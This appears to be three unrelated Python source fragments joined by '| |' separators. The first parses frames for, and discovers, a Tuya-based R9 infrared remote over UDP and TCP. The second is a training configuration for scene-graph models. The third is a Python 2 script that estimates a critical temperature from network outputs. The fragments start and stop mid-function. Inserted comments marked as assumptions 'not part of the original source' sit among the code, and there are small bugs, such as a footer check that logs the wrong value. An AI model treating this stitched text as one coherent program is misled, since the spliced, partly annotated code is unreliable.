lenconf = struct.unpack('>I', retdata[12:16])[0] + 8 + 8
if lenconf != lenorig:
_LOGGER.warning("CheckResp len %d!=%d", lenorig, lenconf)
return CD_CONTINUE_WAITING
headerconf = struct.unpack('>I', retdata[0:4])[0]
if headerconf != 0x000055AA:
_LOGGER.warning("CheckResp header %d!=%d", 0x000055AA, headerconf)
return CD_CONTINUE_WAITING
footerconf = struct.unpack('>I', retdata[-4:])[0]
if footerconf != 0x0000AA55:
_LOGGER.warning("CheckResp footer %d!=%d", 0x0000AA55, headerconf)
return CD_CONTINUE_WAITING
crcconf = struct.unpack('>I', retdata[-8:-4])[0]
crcorig = R9.crc32(retdata[0:-8])
if crcconf != crcorig:
_LOGGER.warning("CheckResp crc %d!=%d", crcorig, crcconf)
return CD_CONTINUE_WAITING
statusconf = struct.unpack('>I', retdata[16:20])[0]
if statusconf != 0:
_LOGGER.warning("CheckResp status %d!=%d", 0, statusconf)
return CD_CONTINUE_WAITING
payload = retdata[20:-8]
try:
jsonstr = payload.decode('utf-8')
except BaseException as ex:
_LOGGER.warning("CheckResp decode %s %s", ex, binascii.hexlify(payload))
return CD_CONTINUE_WAITING
try:
jsondec = json.loads(jsonstr)
except BaseException as ex:
_LOGGER.warning("CheckResp jsonp %s %s", ex, jsonstr)
return CD_CONTINUE_WAITING
if "gwId" in jsondec:
return CD_ADD_AND_CONTINUE_WAITING, jsondec
else:
return CD_CONTINUE_WAITING
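# Hedged helper sketch (assumption, not part of the original source): builds a
# frame in the layout that check_discovery_packet()/_generic_check_resp()
# expect -- 0x000055AA header, sequence number, command word, a length field
# covering everything after itself, a status word, the payload, a CRC32 over
# all preceding bytes and the 0x0000AA55 footer. Useful for unit-testing the
# parsers with synthetic packets:
#
#   def build_frame(command, payload, seq=0, status=0):
#       body = struct.pack('>I', status) + payload
#       head = struct.pack('>4I', 0x000055AA, seq, command, len(body) + 8)
#       crc = R9.crc32(head + body)
#       return head + body + struct.pack('>2I', crc, 0x0000AA55)
#
#   frame = build_frame(R9.ASK_LAST_COMMAND, b'{"gwId": "abc"}')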
@staticmethod
async def discovery(timeout, retry=3):
"""!
Discovers Tuya devices by listening for broadcast UDP messages sent to port 6666
@param timeout: [int] time to wait for broadcast messages
@param retry: [int] Number of retries to make if no device is found (Optional)
@return [dict] A dict whose keys are ip addresses of Tuya devices and values are R9 objects. Please note that the found R9 devices
cannot be used before setting the correct encryption key (it is set to b'<KEY>' by default)
"""
out_data = None
_local = None
addr = ('255.255.255.255', 6666)
for _ in range(retry):
try:
_local = await open_local_endpoint(port=6666, allow_broadcast=True)
if _local:
for _ in range(retry):
out_data = await _local.protocol(None, addr, R9.check_discovery_packet, timeout, 1, True)
if out_data:
break
break
except BaseException as ex:
_LOGGER.error("Protocol[%s:%d] error: %s", *addr, str(ex))
finally:
if _local:
try:
_local.abort()
except Exception:
pass
finally:
_local = None
if _local:
try:
_local.abort()
except Exception:
pass
finally:
_local = None
rv = dict()
if out_data:
for o in out_data:
try:
it = o[0]
if it['ip'] not in rv:
obj = R9((it['ip'], DEFAULT_PORT), it['gwId'], b'0123456789abcdef')
rv[it['ip']] = obj
_LOGGER.info("Discovered %s", obj)
except BaseException as ex:
_LOGGER.error("Error in discovery process %s", ex)
return rv
def __init__(self, hp, idv, key, timeout=5, force_reconnect_s=20):
"""!
Constructs R9 remote Object
@param hp: [tuple] A tuple with host and port of the R9 remote
@param idv: [string] id of the R9 object
@param key: [string|bytes] key used to encrypt/decrypt messages from/to R9
@param timeout: [int] timeout to be used in TCP communication (optional)
@param force_reconnect_s: [int] seconds after which to force reconnection
"""
self._hp = hp
self._id = idv
if isinstance(key, str):
key = key.encode()
self._key = key
self._timeout = timeout
self._cipher = AES.new(key, mode=AES.MODE_ECB)
self._pktnum = 1
self._uid = ''.join(random.choices(string.ascii_letters + string.digits, k=20))
self._reader = None
self._writer = None
self._contime = 0
self._force_reconnect_s = force_reconnect_s
def __repr__(self):
"""!
Gets string representation of this R9 object
@return [string] string representation of this R9 object
"""
return '(%s:%d) id=%s key=%s' % (*self._hp, self._id, self._key)
async def destroy_connection(self):
"""!
Destroys the connection with the R9 device
"""
try:
if self._writer:
self._writer.close()
await self._writer.wait_closed()
except Exception:
pass
finally:
self._writer = None
self._reader = None
self._pktnum = 1
async def _init_connection(self):
try:
if self._force_reconnect_s > 0 and time.time() - self._contime > self._force_reconnect_s:
await self.destroy_connection()
if not self._writer:
_LOGGER.debug("Connecting to %s:%d (TCP)", *self._hp)
self._reader, self._writer = await asyncio.open_connection(*self._hp)
self._contime = time.time()
return True
except BaseException as ex:
_LOGGER.error("Cannot estabilish connection %s: %s", str(ex), traceback.format_exc())
await self.destroy_connection()
return False
def _generic_check_resp(self, retdata, command, command_in_dict=None, status_ok=[0]):
"""!
Checks payload of TCP packet received from the R9 device. This includes Status value check, CRC32 check, AES decryption (if needed), and MD5 check (if needed)
@param retdata: [bytes] bytes of the TCP packet payload received prom R9 device
@param command: [int] Command that is expected in the packet header
@param command_in_dict: [string|NoneType] Command that is expected in the packet JSON dps["1"]. If NoneType, no JSON is expected in packet content. If equal to '',
no dps["1"] is expected in packet JSON
@param status_ok: [list] Accepted status codes. Defaults to [0]
@return [dict|boolean] On successful check if no JSON content is present, True is returned, Otherwise the parsed dict is returned.
If check fails, False is returned
"""
lenorig = len(retdata)
if lenorig < 12 + 8 + 8:
_LOGGER.warning("CheckResp small len=%d", lenorig)
return False
lenconf = struct.unpack('>I', retdata[12:16])[0] + 8 + 8
if lenconf != lenorig:
_LOGGER.warning("CheckResp len %d!=%d", lenorig, lenconf)
return False
commandconf = struct.unpack('>I', retdata[8:12])[0]
if commandconf != command:
_LOGGER.warning("CheckResp command[%d] %d!=%d", lenorig, command, commandconf)
return False
headerconf = struct.unpack('>I', retdata[0:4])[0]
if headerconf != 0x000055AA:
_LOGGER.warning("CheckResp header %d!=%d", 0x000055AA, headerconf)
return False
footerconf = struct.unpack('>I', retdata[-4:])[0]
if footerconf != 0x0000AA55:
_LOGGER.warning("CheckResp footer %d!=%d", 0x0000AA55, headerconf)
return False
crcconf = struct.unpack('>I', retdata[-8:-4])[0]
crcorig = R9.crc32(retdata[0:-8])
if crcconf != crcorig:
_LOGGER.warning("CheckResp crc %d!=%d", crcorig, crcconf)
return False
statusconf = struct.unpack('>I', retdata[16:20])[0]
if statusconf not in status_ok:
_LOGGER.warning("CheckResp status %d!=%d", status_ok, statusconf)
return False
if command_in_dict is None:
return True
if lenorig <= 12 + 8 + 8 + 16 + len(R9.PROTOCOL_VERSION_BYTES):
_LOGGER.warning("CheckResp small2 len=%d", lenorig)
return False
protocolconf = retdata[20:23]
if protocolconf != R9.PROTOCOL_VERSION_BYTES:
_LOGGER.warning("CheckResp prot | |
"""
Configuration file!
"""
import os
import sys
from argparse import ArgumentParser
import numpy as np
ROOT_PATH = os.path.dirname(os.path.realpath(__file__))
DATA_PATH = os.path.join(ROOT_PATH, 'data')
OLD_DATA_PATH = '../Large-Scale-VRD.pytorch/data/'
CO_OCCOUR_PATH = os.path.join(DATA_PATH, 'co_occour_count.npy')
def path(fn):
return os.path.join(DATA_PATH, fn)
def stanford_path(fn):
return os.path.join(DATA_PATH, 'stanford_filtered', fn)
# =============================================================================
# Update these with where your data is stored ~~~~~~~~~~~~~~~~~~~~~~~~~
VG_IMAGES = 'data/datasets/visual-genome/VG_100K'
RCNN_CHECKPOINT_FN = path('faster_rcnn_500k.h5')
IM_DATA_FN = stanford_path('image_data.json')
VG_SGG_FN = stanford_path('VG-SGG.h5')
VG_SGG_DICT_FN = stanford_path('VG-SGG-dicts.json')
PROPOSAL_FN = stanford_path('proposals.h5')
# =============================================================================
# =============================================================================
MODES = ('sgdet', 'sgcls', 'predcls', 'objcls', 'objdet')
LOG_SOFTMAX = True
BOX_SCALE = 1024 # Scale at which we have the boxes
IM_SCALE = 592 # Our images will be resized to this res without padding
# Proposal assignments
BG_THRESH_HI = 0.5
BG_THRESH_LO = 0.0
RPN_POSITIVE_OVERLAP = 0.7
# IOU < thresh: negative example
RPN_NEGATIVE_OVERLAP = 0.3
# Max number of foreground examples
RPN_FG_FRACTION = 0.5
FG_FRACTION = 0.25
# Total number of examples
RPN_BATCHSIZE = 256
ROIS_PER_IMG = 256
REL_FG_FRACTION = 0.25
RELS_PER_IMG = 256
RELS_PER_IMG_REFINE = 64
BATCHNORM_MOMENTUM = 0.01
ANCHOR_SIZE = 16
ANCHOR_RATIOS = (0.23232838, 0.63365731, 1.28478321, 3.15089189) #(0.5, 1, 2)
ANCHOR_SCALES = (2.22152954, 4.12315647, 7.21692515, 12.60263013, 22.7102731) #(4, 8, 16, 32)
NORM_SCALE = 10.0
SAMPLING_K = 8
DIM_EMBED = 300
VAL_BATCH_SPLIT_SIZE = 256
PREDICATES_WEIGHTS = np.ones(51, dtype=np.float32)
PREDICATES_WEIGHTS[0] = 0.1
class ModelConfig(object):
"""Wrapper class for model hyperparameters."""
def __init__(self):
"""
Defaults
"""
self.ckpt = None
self.save_dir = None
self.lr = None
self.batch_size = None
self.val_size = None
self.l2 = None
self.adamwd = None
self.clip = None
self.num_gpus = None
self.num_workers = None
self.print_interval = None
self.mode = None
self.test = False
self.adam = False
self.cache = None
self.use_proposals=False
self.use_resnet=False
self.num_epochs=None
self.pooling_dim = None
self.use_obj = False
self.obj_time_step_num = None
self.obj_hidden_dim = None
self.obj_output_dim = None
self.use_obj_knowledge = False
self.obj_knowledge = None
self.use_dualResGCN_rel = False
self.dualResGCN_rel_hidden_dim = None
self.dualResGCN_rel_output_dim = None
self.use_rel_knowledge = False
self.rel_knowledge = None
self.tb_log_dir = None
self.save_rel_recall = None
self.parser = self.setup_parser()
args, unknown = self.parser.parse_known_args()
self.args = vars(args)
self.__dict__.update(self.args)
if len(self.ckpt) != 0:
self.ckpt = os.path.join(ROOT_PATH, self.ckpt)
else:
self.ckpt = None
if self.run_name != '':
self.save_dir = os.path.join(ROOT_PATH, 'checkpoints', self.run_name)
self.tb_log_dir = os.path.join(ROOT_PATH, 'summaries', self.run_name)
os.makedirs(self.save_dir, exist_ok=True)
os.makedirs(self.tb_log_dir, exist_ok=True)
else:
if self.ckpt is not None and self.ckpt.split('-')[-2].split('/')[-1] == 'vgrel':
self.save_dir = os.path.dirname(self.ckpt)
elif len(self.save_dir) == 0:
self.save_dir = None
else:
self.save_dir = os.path.join(ROOT_PATH, self.save_dir)
if not os.path.exists(self.save_dir):
os.mkdir(self.save_dir)
if len(self.tb_log_dir) != 0:
self.tb_log_dir = os.path.join(ROOT_PATH, self.tb_log_dir)
if not os.path.exists(self.tb_log_dir):
os.makedirs(self.tb_log_dir) # help make multi depth directories, such as summaries/kern_predcls
else:
self.tb_log_dir = None
if self.cache == '' and self.save_dir is not None:
self.cache = os.path.join(self.save_dir, 'caches/test_prediction.pkl')
os.makedirs(os.path.dirname(self.cache), exist_ok=True)
elif self.cache == 'none':
self.cache = None
assert self.val_size >= 0
if self.mode not in MODES:
raise ValueError("Invalid mode: mode must be in {}".format(MODES))
if self.ckpt is not None and not os.path.exists(self.ckpt):
raise ValueError("Ckpt file ({}) doesnt exist".format(self.ckpt))
log_mesg = ''
# Record the current script command
log_mesg += '~~~~~~~~ Script: ~~~~~~~\n'
log_mesg += 'python %s\n' % ' '.join(sys.argv)
log_mesg += '~~~~~~~~ Hyperparameters used: ~~~~~~~\n'
for x, y in self.__dict__.items():
log_mesg += '{} : {}\n'.format(x, y)
log_mesg += '~~~~~~~~ Unknown args: ~~~~~~~\n'
log_mesg += '{}\n'.format(unknown)
print(log_mesg)
if self.save_dir is not None:
with open(os.path.join(self.save_dir, 'config-%s.txt' % os.path.basename(sys.argv[0])), 'w') as f:
f.write(log_mesg)
def setup_parser(self):
"""
Sets up an argument parser
:return:
"""
parser = ArgumentParser(description='training code')
parser.add_argument('-ckpt', dest='ckpt', help='Filename to load from', type=str, default='checkpoints/vgdet/vg-faster-rcnn.tar')
parser.add_argument('-run_name', dest='run_name', help='Name of the current run', type=str, default='')
parser.add_argument('-save_dir', dest='save_dir',
help='Directory to save things to, such as checkpoints/save', default='', type=str)
parser.add_argument('-resume_training', help='resume for continuing training', action='store_true')
parser.add_argument('-keep_old_ckpt', help='not to remove all old checkpoints, mainly for finetune debug', action='store_true')
parser.add_argument('-ngpu', dest='num_gpus', help='number of GPUs to use', type=int, default=1)
parser.add_argument('-nwork', dest='num_workers', help='num processes to use as workers', type=int, default=8)
parser.add_argument('-lr', dest='lr', help='learning rate', type=float, default=1e-5)
parser.add_argument('-b', dest='batch_size', help='batch size per GPU',type=int, default=8)
parser.add_argument('-val_size', dest='val_size', help='val size to use (if 0 we wont use val)', type=int, default=5000)
parser.add_argument('-l2', dest='l2', help='weight decay of SGD', type=float, default=1e-4)
parser.add_argument('-adamwd', dest='adamwd', help='weight decay of adam', type=float, default=0.0)
parser.add_argument('-clip', dest='clip', help='gradients will be clipped to have norm less than this', type=float, default=5.0)
parser.add_argument('-p', dest='print_interval', help='print during training', type=int,
default=100)
parser.add_argument('-m', dest='mode', help='mode in {sgdet, sgcls, predcls, objcls, objdet}', type=str, default='predcls')
parser.add_argument('-cache', dest='cache', help='where should we cache predictions', type=str,
default='')
parser.add_argument('-cache2', dest='cache2', help='predictions cache path of baseline model for comparison', type=str,
default='')
parser.add_argument('-model', dest='model', help='which model to use', type=str,
default='motifs')
parser.add_argument('-adam', dest='adam', help='use adam', action='store_true')
parser.add_argument('-test', dest='test', help='test set', action='store_true')
parser.add_argument('-nimg', dest='num_im', help='Number of images to use, mainly for quick debugging', type=int, default=-1)
parser.add_argument('-nepoch', dest='num_epochs', help='Number of epochs to train the model for',type=int, default=20)
parser.add_argument('-resnet', dest='use_resnet', help='use resnet instead of VGG', action='store_true')
parser.add_argument('-proposals', dest='use_proposals', help='Use Xu et als proposals', action='store_true')
parser.add_argument('-save_freq', dest='save_freq', help='Every n epochs to save model', type=int, default=5)
parser.add_argument('-class_loss_weight', help='discount weight for class loss', type=float, default=1.0)
parser.add_argument('-use_pred_entries_cache', help='use cache of pred entries instead of running network in evaluation', action='store_true')
parser.add_argument('-gt_labels_for_bias', help='use GT labels to retrieve bias in training', action='store_true')
parser.add_argument('-use_word_vec', help='use word vectors in object feature', action='store_true')
parser.add_argument('-cache_obj_dists', help='cache object predictions', action='store_true')
parser.add_argument('-cache_det_res', help='cache object detection results', action='store_true')
parser.add_argument('-cache_gaussians', help='cache predicted gaussians of instances', action='store_true')
parser.add_argument('-obj_dists_path', help='path of cached object predictions for predcls to read', type=str, default='')
parser.add_argument('-obj_det_path', help='path of cached object detections for predcls to read', type=str, default='')
parser.add_argument('-gaussians_path', help='path of cached gaussians', type=str, default='')
parser.add_argument('-test_data_name', help='split name of test data, could be train sometimes', type=str, default='test')
parser.add_argument('-inference_times', help='times of inference for visual gaussian model', type=int, default=5)
parser.add_argument('-no_word_vec_for_predcls', help='not to use word vec in predcls mode, mainly for testing sgcls/sgdet models', action='store_true')
parser.add_argument('-num_boxes_per_img', help='number of predicted boxes for each image, used for detection', type=int, default=64)
parser.add_argument('-test_as_val', help='use test data as validation after each epoch', action='store_true')
parser.add_argument('-new_lr_strategy', help='new lr strategy including only 2 stages', action='store_true')
parser.add_argument('-use_nps_loss', help='use nps loss for object detection', action='store_true')
parser.add_argument('-use_focal_loss', help='use focal loss for object detection', action='store_true')
parser.add_argument('-obj_dists_cache_as_output', help='use cached rm_obj_dists as output without obj_cls', action='store_true')
parser.add_argument('-add_ori_obj_dists', help='add original rm_obj_dists to the final one', action='store_true')
parser.add_argument('-fixed_obj_det_in_training', help='use fixed obj det in training', action='store_true')
parser.add_argument('-no_rel_loss', help='not to use rel_loss', action='store_true')
# Arguments for visualization
parser.add_argument('-prd_to_view', help='Specify a predicate list to view embeddings', type=str, nargs='+')
parser.add_argument('-reduce_method', help='Method to reduce high-dimensional data', type=str, default='pca')
parser.add_argument('-num_example_per_prd', help='Number of examples for each predicate', type=int, default=5)
# Arguments for CrossAttGCN
parser.add_argument('-use_obj', dest='use_obj', help='use obj module', action='store_true')
parser.add_argument('-obj_time_step_num', dest='obj_time_step_num', help='time step number of obj', type=int, default=3)
parser.add_argument('-obj_hidden_dim', dest='obj_hidden_dim', help='node hidden state dimension of obj', type=int, default=512)
parser.add_argument('-obj_output_dim', dest='obj_output_dim', help='node output feature dimension of obj', type=int, default=512)
parser.add_argument('-use_obj_knowledge', dest='use_obj_knowledge', help='use object cooccurrence knowledge', action='store_true')
parser.add_argument('-obj_knowledge', dest='obj_knowledge', help='Filename to load matrix of object cooccurrence knowledge', type=str, default='')
parser.add_argument('-hidden_dim', dest='hidden_dim', help='node hidden state dimension', type=int, default=1024)
parser.add_argument('-pooling_dim', dest='pooling_dim', help='pooling dimension', type=int, default=4096)
parser.add_argument('-use_dualResGCN_rel', dest='use_dualResGCN_rel', help='use dualResGCN_rel module', action='store_true')
parser.add_argument('-dualResGCN_rel_hidden_dim', dest='dualResGCN_rel_hidden_dim', help='node hidden state dimension of dualResGCN_rel', type=int, default=512)
parser.add_argument('-dualResGCN_rel_output_dim', dest='dualResGCN_rel_output_dim', help='node output feature dimension of dualResGCN_rel', type=int, default=512)
parser.add_argument('-use_rel_knowledge', dest='use_rel_knowledge', help='use cooccurrence knowledge of object pairs and relationships', action='store_true')
parser.add_argument('-pred_weight', dest='pred_weight', action='store_true')
parser.add_argument('-old_split_atten_map', help='use original Split_Atten_map codes, just for compatibility', action='store_true')
parser.add_argument('-no_freq_gate', help='not to use frequency gate', action='store_true')
parser.add_argument('-no_bias_in_training', help='not to use bias in training', action='store_true')
parser.add_argument('-no_bias', help='not to use bias at all', action='store_true')
parser.add_argument('-nms_thresh', help='threshold for NMS post-processing', type=float, default=0.5)
# Arguments for KERN
parser.add_argument('-ggnn_rel_time_step_num', dest='ggnn_rel_time_step_num', help='time step number of GGNN_rel', type=int, default=3)
parser.add_argument('-ggnn_rel_hidden_dim', dest='ggnn_rel_hidden_dim',
help='node hidden state dimension of GGNN_rel', type=int, default=512)
parser.add_argument('-ggnn_rel_output_dim', dest='ggnn_rel_output_dim',
help='node output feature dimension of GGNN_rel', type=int, default=512)
parser.add_argument('-rel_knowledge', dest='rel_knowledge', help='Filename to load matrix of cooccurrence knowledge of object pairs and relationships',
type=str, default='prior_matrices/rel_matrix.npy')
parser.add_argument('-test_split_size', help='Split size for batch in testing', type=int, default=1024)
# Arguments for Motifs
parser.add_argument('-order', dest='order', help='Linearization order for Rois (confidence -default, size, random)',
type=str, default='leftright')
parser.add_argument('-nl_obj', dest='nl_obj', help='Num object layers', type=int, default=2)
parser.add_argument('-nl_edge', dest='nl_edge', help='Num edge layers', type=int, default=4)
parser.add_argument('-motifs_hidden_dim', help='node hidden state dimension', type=int, default=512)
parser.add_argument('-pass_in_obj_feats_to_decoder', dest='pass_in_obj_feats_to_decoder', action='store_true')
parser.add_argument('-pass_in_obj_feats_to_edge', dest='pass_in_obj_feats_to_edge', action='store_true')
parser.add_argument('-rec_dropout', dest='rec_dropout', help='recurrent dropout to add', type=float, default=0.1)
parser.add_argument('-use_bias', dest='use_bias', action='store_true')
parser.add_argument('-use_bimodal_rel', dest='use_bimodal_rel', action='store_true')
# Arguments for VCTree
parser.add_argument('-use_rl_tree', dest='use_rl_tree', action='store_true')
# Arguments for Bimodal
parser.add_argument('-use_gaussian', dest='use_gaussian', help='use Gaussian embedding', action='store_true')
parser.add_argument('-gaussian_reg', dest='gaussian_reg', help='type of regularization for Gaussian embedding', type=str, default='entropy')
parser.add_argument('-uncer_margin', dest='uncer_margin', help='uncertainty margin used for regularization', type=float, default=200)
parser.add_argument('-reg_weight', dest='reg_weight', help='weight for regularization', type=float, default=0.0001)
parser.add_argument('-metric', dest='metric', help='Metric to compute match probability', type=str, default='w-distance')
# Arguments for visual Gaussian
parser.add_argument('-visual_gaussian', dest='visual_gaussian', help='use Gaussian embedding for only visual branch', action='store_true')
parser.add_argument('-num_gaussian_samples', dest='num_gaussian_samples', help='number | |
import cubic_spline_interpolation
import matplotlib.pyplot as plt
import numpy as np
import sys
filename_measurements = '20160810-0955_measurements_CNN0a.dat'
filename_result = '20160810-0955_result_CNN0a.dat'
filename_measurements = '20160811-1459_measurements_CNN0a.dat'
filename_result = '20160811-1459_result_CNN0a.dat'
filename_measurements = '20160814-2317_measurements_U20_CNN0f.dat'
filename_result = '20160815-1525_classified_U4_CNN0f_using_U5+U20.dat'
filename_result = '20160815-1547_classified_U4_CNN0_using_U5+U20.dat'
filename_result = '20160815-1538_classified_U4_CNN0_using_U5.dat'
filename_result = '20160815-1548_classified_U4_CNN0f_using_U5.dat'
plot_progress_output_and_accuracy = False
#filename_measurements = '20160803-0833_measurements.dat'
#filename_result = '20160803-0833_result.dat'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0.py\ U5\ Test\ accuracy:\ 80.4}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0.py\ U20\ Test\ accuracy:\ 98.3}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0.py\ U5\ +\ U20\ Test\ accuracy:\ 83.9}$'
title = '$\mathrm{Network:\ TF\_HSF\_CNN0f.py\ U5\ Test\ accuracy:\ 85.4}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0f.py\ U20\ Test\ accuracy:\ 99.2}$'
#title = '$\mathrm{Network:\ TF\_HSF\_CNN0f.py\ U5\ +\ U20\ Test\ accuracy:\ 87.7}$'
# temperature_U1 index_U1 closest to T_c
index_U1 = 25
# Potential energy data set 1
U1 = 4
# Critical temperature_U1
T_c_U1= 0.16
# Initial guess solution of critical temperature_U1
T_c_guess_U1 = 0.2
# temperature_U2 index_U2 closest to T_c
index_U2 = 20
# Potential energy data set 2
U2 = 20
# Critical temperature_U2
T_c_U2= 0.19
# Initial guess solution of critical temperature_U2
T_c_guess_U2 = 0.19
T_c_U1_known = True
use_single_U = True
U1_temp_len = 48
# 'equal' or 'log'
grid = 'equal'
grid = 'log'
# 'cubic' or 'linear'
interpolation = 'cubic'
interpolation = 'linear'
def quadratic1_U1( x ):
T = temperature_U1[index_U1]
a, b, c, d = params_a1[index_U1], params_b1[index_U1], params_c1[index_U1], params_d1[index_U1]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def quadratic2_U1( x ):
T = temperature_U1[index_U1]
a, b, c, d = params_a2[index_U1], params_b2[index_U1], params_c2[index_U1], params_d2[index_U1]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def quadratic1_U2( x ):
T = temperature_U2[index_U2]
a, b, c, d = params_a1[index_U2], params_b1[index_U2], params_c1[index_U2], params_d1[index_U2]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def quadratic2_U2( x ):
T = temperature_U2[index_U2]
a, b, c, d = params_a2[index_U2], params_b2[index_U2], params_c2[index_U2], params_d2[index_U2]
return a + b*(x-T) + c*(x-T)**2. + d*(x-T)**3., b + 2.*c*(x-T) + 3.*d*(x-T)**2.
def linear1_U1( x ):
delta_y = (output_neuron1_U1[index_U1+1]-output_neuron1_U1[index_U1])
delta_x = (temperature_U1[index_U1+1]-temperature_U1[index_U1])
b = output_neuron1_U1[index_U1] - delta_y*temperature_U1[index_U1]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def linear2_U1( x ):
delta_y = (output_neuron2_U1[index_U1+1]-output_neuron2_U1[index_U1])
delta_x = (temperature_U1[index_U1+1]-temperature_U1[index_U1])
b = output_neuron2_U1[index_U1] - delta_y*temperature_U1[index_U1]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def linear1_U2( x ):
delta_y = (output_neuron1_U2[index_U2+1]-output_neuron1_U2[index_U2])
delta_x = (temperature_U2[index_U2+1]-temperature_U2[index_U2])
b = output_neuron1_U2[index_U2] - delta_y*temperature_U2[index_U2]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def linear2_U2( x ):
delta_y = (output_neuron2_U2[index_U2+1]-output_neuron2_U2[index_U2])
delta_x = (temperature_U2[index_U2+1]-temperature_U2[index_U2])
b = output_neuron2_U2[index_U2] - delta_y*temperature_U2[index_U2]/delta_x
return delta_y*x/delta_x+b, delta_y/delta_x
def dx(f, g, x):
return abs(g(x)[0]-f(x)[0])
def newtons_method(f, g, x0, e = 10e-10):
delta = dx(f, g, x0)
while delta > e:
x0 = x0 - (f(x0)[0] - g(x0)[0])/(f(x0)[1] - g(x0)[1])
delta = dx(f, g, x0)
return x0
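# Hedged example (not in the original script): newtons_method finds the
# intersection of two curves given as functions that return (value, derivative).
# For f(x) = x**2 and g(x) = x + 1, starting from x0 = 2, it converges to the
# golden ratio, about 1.618:
#
#   f = lambda x: (x**2, 2.*x)
#   g = lambda x: (x + 1., 1.)
#   newtons_method(f, g, 2.)   # ~1.6180339887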
#date = filename_result.rsplit('_',5)[0]
date = filename_result.rsplit('.',5)[0]
if plot_progress_output_and_accuracy :
data_measurements = np.loadtxt(filename_measurements)
training_epochs = data_measurements[:,0]
training_accuracy = data_measurements[:,1]
test_accuracy = data_measurements[:,2]
cost = data_measurements[:,3]
data_result = np.loadtxt(filename_result)
if use_single_U :
temperature = data_result[:,0]
sort_index = temperature.argsort()
temperature_U1 = temperature[sort_index]
output_neuron2_U1 = data_result[:,1][sort_index]
output_neuron1_U1 = data_result[:,2][sort_index]
if plot_progress_output_and_accuracy :
accuracy_U1 = data_result[:,3]
if interpolation == 'linear' :
#m1 = (output_neuron1_U1[index_U1+1]-output_neuron1_U1[index_U1])/(temperature_U1[index_U1+1]-temperature_U1[index_U1])
#b1 = output_neuron1_U1[index_U1+1] - m1*temperature_U1[index_U1+1]
#m2 = (output_neuron2_U1[index_U1+1]-output_neuron2_U1[index_U1])/(temperature_U1[index_U1+1]-temperature_U1[index_U1])
#b2 = output_neuron2_U1[index_U1+1] - m2*temperature_U1[index_U1+1]
#T_c_experiment_x_U1 = (b2-b1)/(m1-m2)
T_c_experiment_x_U1 = newtons_method( linear1_U1, linear2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = linear1_U1(T_c_experiment_x_U1)[0]
if interpolation == 'cubic' :
# d (accuracy) / d (temperature_U1)
velocity_U1 = np.zeros( np.shape( temperature_U1 ) )
# Get the cubic spline interpolated curve and its parameters
[T_mod1_U1, Output_mod1_U1, V_mod1] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron1_U1, velocity_U1, 250 )
params_a1, params_b1, params_c1, params_d1 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron1_U1, velocity_U1 )
[T_mod2_U1, Output_mod2, V_mod2] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron2_U1, velocity_U1, 250 )
params_a2, params_b2, params_c2, params_d2 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron2_U1, velocity_U1 )
T_c_experiment_x_U1 = newtons_method( quadratic1_U1, quadratic2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = quadratic2_U1(T_c_experiment_x_U1)[0]
print 'T_c (U=%d) = %.2f' % (U1, T_c_U1)
print 'T_c, experiment = %.2f' % T_c_experiment_x_U1
print 'Percent error = %.2g %%' % (abs(1.-T_c_experiment_x_U1/T_c_U1)*100)
else :
temperature = data_result[:,0]
temperature_U1 = data_result[:,0][:U1_temp_len]
output_neuron2_U1 = data_result[:,1][:U1_temp_len]
output_neuron1_U1 = data_result[:,2][:U1_temp_len]
if plot_progress_output_and_accuracy :
accuracy_U1 = data_result[:,3][:U1_temp_len]
temperature_U2 = data_result[:,0][U1_temp_len:]
output_neuron2_U2 = data_result[:,1][U1_temp_len:]
output_neuron1_U2 = data_result[:,2][U1_temp_len:]
if plot_progress_output_and_accuracy :
accuracy_U2 = data_result[:,3][U1_temp_len:]
if interpolation == 'linear' :
T_c_experiment_x_U1 = newtons_method( linear1_U1, linear2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = linear1_U1(T_c_experiment_x_U1)[0]
T_c_experiment_x_U2 = newtons_method( linear1_U2, linear2_U2, T_c_guess_U2 )
T_c_experiment_y_U2 = linear1_U2(T_c_experiment_x_U2)[0]
if interpolation == 'cubic' :
# d (accuracy) / d (temperature_U1)
velocity_U1 = np.zeros( np.shape( temperature_U1 ) )
# Get the cubic spline interpolated curve and its parameters
[T_mod1_U1, Output_mod1_U1, V_mod1] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron1_U1, velocity_U1, 250 )
params_a1, params_b1, params_c1, params_d1 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron1_U1, velocity_U1 )
[T_mod2_U1, Output_mod2_U1, V_mod2] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U1, output_neuron2_U1, velocity_U1, 250 )
params_a2, params_b2, params_c2, params_d2 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U1, output_neuron2_U1, velocity_U1 )
T_c_experiment_x_U1 = newtons_method( quadratic1_U1, quadratic2_U1, T_c_guess_U1 )
T_c_experiment_y_U1 = quadratic2_U1(T_c_experiment_x_U1)[0]
# d (accuracy) / d (temperature_U2)
velocity_U2 = np.zeros( np.shape( temperature_U2 ) )
# Get the cubic spline interpolated curve and its parameters
[T_mod1_U2, Output_mod1_U2, V_mod1] = cubic_spline_interpolation.ClampedCubicSpline( temperature_U2, output_neuron1_U2, velocity_U2, 250 )
params_a1, params_b1, params_c1, params_d1 = cubic_spline_interpolation.ClampedCubicSplineCoefficients( temperature_U2, output_neuron1_U2, velocity_U2 )
